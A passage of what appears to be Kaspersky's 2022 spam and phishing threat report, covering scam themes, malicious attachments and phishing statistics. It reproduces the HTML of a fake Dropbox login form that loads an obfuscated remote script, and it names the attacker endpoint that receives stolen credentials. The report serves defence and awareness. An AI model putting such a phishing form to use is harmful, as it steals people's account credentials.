costs&quot;.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)\n\nGrowing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide the type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of \u00a3400 was supposed to make the victim drop their guard and share their personal information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)\n\nIn Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)\n\n### Fake online stores and large vendor phishing\n\nWe see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)\n\n&quot;Insides&quot; about &quot;private sales&quot; were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.\n\nMany large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)\n\n### Hijacking of social media accounts\n\nUsers of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims to have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user&#x27;s appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the &quot;update&quot;, the victim was asked to enter their account credentials, which the scammers immediately took over.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)\n\nMany Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)\n\nRussia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users&#x27; risk of losing personal data was now higher, too. &quot;Well-wishers&quot; who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to a search to be done for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search \u2014 the scammers simply stole the credentials they requested for the check.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)\n\nOne of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)\n\nThe Telegram Premium status provides a range of benefits, from an ad-free experience to an ability to block incoming voice messages, but the subscription costs money. Scammers offered to &quot;test&quot; a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)\n\nOne more phishing campaign targeting Telegram users was arranged to coincide with the New Year&#x27;s celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children&#x27;s drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends&#x27; kids&#x27; works. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on the users to go straight to voting, without checking the authenticity of the drawings, which had been copied from various past years&#x27; competition pages, as requests to vote for one&#x27;s friends&#x27; kids are common before public holidays.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)\n\nThe Telegram auction platform named Fragment went live in the October of 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)\n\n## Spam in 2022\n\n### The pandemic\n\nUnlike phishing, COVID-themed spam is still a thing. Most of that is &quot;Nigerian-type&quot; scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. Others are offered hefty amounts under an anti-recession assistance program.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)\n\nThe amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk by three times by yearend.\n\n### Contact form spam\n\nThe year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims&#x27; email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user&#x27;s email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)\n\nMost scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190\u20134200 in VAT refunds. To get the money, the victim was offered to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)\n\nScammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on &quot;prizes&quot; or &quot;earning money&quot;, messages in other languages, in addition to offering &quot;prizes&quot;, encouraged users to visit &quot;dating sites&quot; \u2014 in fact, populated by bots \u2014 where the victims would no doubt be asked to pay for a premium account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)\n\nWe blocked upward of a million scam emails sent via legitimate forms in 2022.\n\n### Blackmail in the name of law enforcement agencies\n\nExtortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.\n\nThe essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)\n\nTo avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and &quot;settle the matter&quot;. Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim&#x27;s name to be removed from the &quot;criminal case&quot;. In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.\n\n### Exploiting the news\n\nSpammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through the bank ones. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)\n\nThe news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)\n\nMore and more &quot;business offers&quot; are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia. The email text emphasized the fact that many transport companies refused to provide such services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)\n\nThere were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)\n\nThe shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)\n\nSpammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million of such mailings.\n\nAgainst the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)\n\n### Spam with malicious attachments\n\nEmployees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, not only targeting HR-specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company&#x27;s profile, and applying business language. They also actively exploited off the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)\n\nMasking malicious emails as business correspondence has become a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)\n\nIn most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows you to gain access to emails and steal them for further attacks.\n\nMailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender&#x27;s addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as &quot;key points of the meeting&quot;. For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.\n\nThe perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of call-up &quot;as part of partial mobilization&quot; or as a &quot;new solution&quot; to safeguard against possible threats on the internet &quot;caused by hostile organizations&quot;.\n\nIn the second case, the program installed on victim&#x27;s computer was in fact a crypto-ransomware Trojan.\n\n## Two-stage spear phishing using a known phish kit\n\nIn 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers in the name of a potential client asked the victim to specify information about its products and services. After the victim responds to this email, the attackers start a phishing attack.\n\nKey facts:\n\n * Attackers use fake Dropbox pages created using a well-known phishing kit\n * The campaign targets the sales departments of manufacturers and suppliers of goods and services\n * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)\n\n### Statistics\n\nThe campaign began in April 2022, with malicious activity peaking in May, and ended by June.\n\n_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_\n\n### How a phishing campaign unfolds\n\nAttackers send an email in the name of a real trade organization requesting more information about the victim company&#x27;s products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender&#x27;s email address from a free domain, like gmail.com, may raise doubts. The email on the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different to its name in the signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)\n\n**_Example of the first email_**\n\nIt is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and _Reply-to_ header (where the reply will go when clicking &quot;Reply&quot; in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.\n\nAfter victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)\n\n**_An email with a phishing link_**\n\nBy clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)\n\n**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**\n\nIn the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)\n\n**_A fake Dropbox page_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)\n\n**_Login page with a phishing form_**\n\nWhen victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.\n \n \n <form name=\"loginform\">\n <div class=\"form-group\">\n <label for=\"\">Email Address</label>\n <input type=\"email\" id=\"email\" class=\"form-control\" name=\"email\" placeholder=\"email Address\">\n <div class=\"email-error\"></div>\n </div>\n <div class=\"form-group\">\n <label for=\"\">Password</label>\n <input type=\"password\" id=\"password\" class=\"form-control\" name=\"password\" placeholder=\"Password\">\n <div class=\"password-error\"></div>\n </div>\n <div class=\"form-group btn-area\">\n <button class=\"download-btn\" id=\"db\" type=\"submit\">Download</button>\n </div>\n </form>\n </div>\n <script src=\"https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&amp;token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b\"></script>\n\n**_HTML representation of a phishing form_**\n\n### Victims\n\nWe have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic has gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.\n\n_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_\n\nThe most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest, only 45.20% of emails in this month were spam.\n\nOn Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend for a gradual shift in ratio in favor of legitimate correspondence can also be seen. We saw the largest share of spam in Runet in the first quarter, with 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.\n\n_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_\n\nEven though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. And the quietest month in Runet was December (47.18%), the same as globally.\n\n### Countries and territories \u2014 sources of spam\n\nIn 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).\n\n_TOP 20 countries and territories \u2014 sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_\n\nThe Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).\n\n### Malicious mail attachments\n\nIn 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That&#x27;s an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.\n\n_Number of Mail Anti-Virus hits, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_\n\nThe most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%) spreading as archived electronic documents moved down to third place. The fourth most common malware were vulnerability exploits [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits in the same component (1.80%). This vulnerability was more widespread in 2021 and has now dropped to tenth place.\n\n_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_\n\n[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims&#x27; devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims&#x27; devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.\n\n_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_\n\nThe list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.\n\n### Countries and territories targeted by malicious mailings\n\nSpain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.\n\n_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_\n\nIn Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.\n\n## Statistics: phishing\n\nIn 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.\n\n### Map of phishing attacks\n\nIn 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year&#x27;s ranking. Madagascar is in third place (12.04%), which was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.\n\nTOP 10 countries and territories by share of attacked users:\n\n**Country/territory** | **Share of attacked users*** \n---|--- \nVietnam | 17.03% \nMacau | 13.88% \nMadagascar | 12.04% \nAlgeria | 11.05% \nEcuador | 11.05% \nMalawi | 10.91% \nBrunei | 10.59% \nBrazil | 10.57% \nMorocco | 10.43% \nPortugal | 10.33% \n \n**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**\n\n### Top-level domains\n\nAs in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. Zone XYZ remained in second place (8.79%), whose share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.\n\n_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_\n\nDomains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. In addition to this, the top ten domain zones in most demand among cybercriminals included: RU (1.52%), COM.BR (1.13), DE (0.98%), CO.UK (0.98%) and SE (0.92%).\n\n### Organizations under phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nIn 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.\n\n_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_\n\nThe share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round complete the TOP 10 categories of sites of interest to criminals.\n\n### Hijacking Telegram accounts\n\nIn 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger&#x27;s users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).\n\n_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_\n\nIt is of note that the majority of phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70\u201390% of all attempts to follow phishing links by Telegram users were made by Russian users.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_\n\nPhishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**\n\nThe largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.\n\n_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_\n\nUnlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could have exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)\n\n**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**\n\nIn Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.\n\n_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_\n\n## Conclusion\n\nTimes of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries&#x27; markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.\n\nRecently, we&#x27;ve seen an increase in targeted phishing attacks where scammers don&#x27;t immediately move on to the phishing attack itself, but only after several introductory emails where there is active correspondence with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-16T08:00:07", "type": 